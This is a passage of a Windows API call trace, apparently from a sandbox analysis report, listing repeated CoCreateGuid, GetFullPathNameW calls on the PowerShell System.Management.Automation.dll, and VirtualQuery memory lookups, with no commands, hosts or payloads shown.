	[0397.076] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xa7f83cc7, Data2=0xa59b, Data3=0x4969, Data4=([0]=0x84, [1]=0xdd, [2]=0xc2, [3]=0xe4, [4]=0x16, [5]=0x35, [6]=0x31, [7]=0xc9))) returned 0x0
	[0397.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.077] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x5ab2a8ec, Data2=0x5556, Data3=0x4504, Data4=([0]=0xb1, [1]=0x1b, [2]=0x7, [3]=0xec, [4]=0x67, [5]=0x70, [6]=0xda, [7]=0xc5))) returned 0x0
	[0397.077] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x14f47757, Data2=0x29ba, Data3=0x4a30, Data4=([0]=0x90, [1]=0xbd, [2]=0xa5, [3]=0xee, [4]=0x5a, [5]=0xd7, [6]=0x6b, [7]=0x32))) returned 0x0
	[0397.077] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x3e19ce97, Data2=0x5d8d, Data3=0x421f, Data4=([0]=0x9e, [1]=0x3f, [2]=0xb5, [3]=0x5, [4]=0xec, [5]=0xeb, [6]=0xd, [7]=0xe9))) returned 0x0
	[0397.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.078] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x6468a9b0, Data2=0xc34f, Data3=0x4683, Data4=([0]=0xb6, [1]=0x65, [2]=0xb3, [3]=0xe5, [4]=0x25, [5]=0xcc, [6]=0x1e, [7]=0xb6))) returned 0x0
	[0397.078] VirtualQuery (in: lpAddress=0x16b4f0, lpBuffer=0x16c3b0, dwLength=0x30 | out: lpBuffer=0x16c3b0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.078] VirtualQuery (in: lpAddress=0x16b4f0, lpBuffer=0x16c3b0, dwLength=0x30 | out: lpBuffer=0x16c3b0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.078] VirtualQuery (in: lpAddress=0x16b580, lpBuffer=0x16c440, dwLength=0x30 | out: lpBuffer=0x16c440*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.079] VirtualQuery (in: lpAddress=0x16b4f0, lpBuffer=0x16c3b0, dwLength=0x30 | out: lpBuffer=0x16c3b0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.079] VirtualQuery (in: lpAddress=0x16b580, lpBuffer=0x16c440, dwLength=0x30 | out: lpBuffer=0x16c440*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.080] VirtualQuery (in: lpAddress=0x16b4f0, lpBuffer=0x16c3b0, dwLength=0x30 | out: lpBuffer=0x16c3b0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.080] VirtualQuery (in: lpAddress=0x16b580, lpBuffer=0x16c440, dwLength=0x30 | out: lpBuffer=0x16c440*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.080] VirtualQuery (in: lpAddress=0x16b4f0, lpBuffer=0x16c3b0, dwLength=0x30 | out: lpBuffer=0x16c3b0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.080] VirtualQuery (in: lpAddress=0x16b580, lpBuffer=0x16c440, dwLength=0x30 | out: lpBuffer=0x16c440*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.080] VirtualQuery (in: lpAddress=0x16b4f0, lpBuffer=0x16c3b0, dwLength=0x30 | out: lpBuffer=0x16c3b0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.080] VirtualQuery (in: lpAddress=0x16b580, lpBuffer=0x16c440, dwLength=0x30 | out: lpBuffer=0x16c440*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.080] VirtualQuery (in: lpAddress=0x16b4f0, lpBuffer=0x16c3b0, dwLength=0x30 | out: lpBuffer=0x16c3b0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.081] VirtualQuery (in: lpAddress=0x16b580, lpBuffer=0x16c440, dwLength=0x30 | out: lpBuffer=0x16c440*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.081] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.081] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.081] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.081] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.081] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.081] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.082] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.082] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xf6a634b3, Data2=0xdd1a, Data3=0x447f, Data4=([0]=0x8e, [1]=0xc7, [2]=0xfb, [3]=0xfa, [4]=0xff, [5]=0x35, [6]=0x5e, [7]=0xd))) returned 0x0
	[0397.082] VirtualQuery (in: lpAddress=0x16be00, lpBuffer=0x16ccc0, dwLength=0x30 | out: lpBuffer=0x16ccc0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.082] VirtualQuery (in: lpAddress=0x16be00, lpBuffer=0x16ccc0, dwLength=0x30 | out: lpBuffer=0x16ccc0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.082] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.082] VirtualQuery (in: lpAddress=0x16be00, lpBuffer=0x16ccc0, dwLength=0x30 | out: lpBuffer=0x16ccc0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.082] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.082] VirtualQuery (in: lpAddress=0x16be00, lpBuffer=0x16ccc0, dwLength=0x30 | out: lpBuffer=0x16ccc0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.083] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.083] VirtualQuery (in: lpAddress=0x16be00, lpBuffer=0x16ccc0, dwLength=0x30 | out: lpBuffer=0x16ccc0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.083] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.083] VirtualQuery (in: lpAddress=0x16be00, lpBuffer=0x16ccc0, dwLength=0x30 | out: lpBuffer=0x16ccc0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.083] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.083] VirtualQuery (in: lpAddress=0x16be00, lpBuffer=0x16ccc0, dwLength=0x30 | out: lpBuffer=0x16ccc0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.083] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.083] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.084] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.084] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.084] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.084] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.084] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.084] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.084] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xf3cf7ac2, Data2=0x9987, Data3=0x4579, Data4=([0]=0xbb, [1]=0xc5, [2]=0xe3, [3]=0x8e, [4]=0x5c, [5]=0x1c, [6]=0xaf, [7]=0xce))) returned 0x0
	[0397.084] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.085] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.085] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.085] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.085] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.085] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.085] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.085] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.413] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.413] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
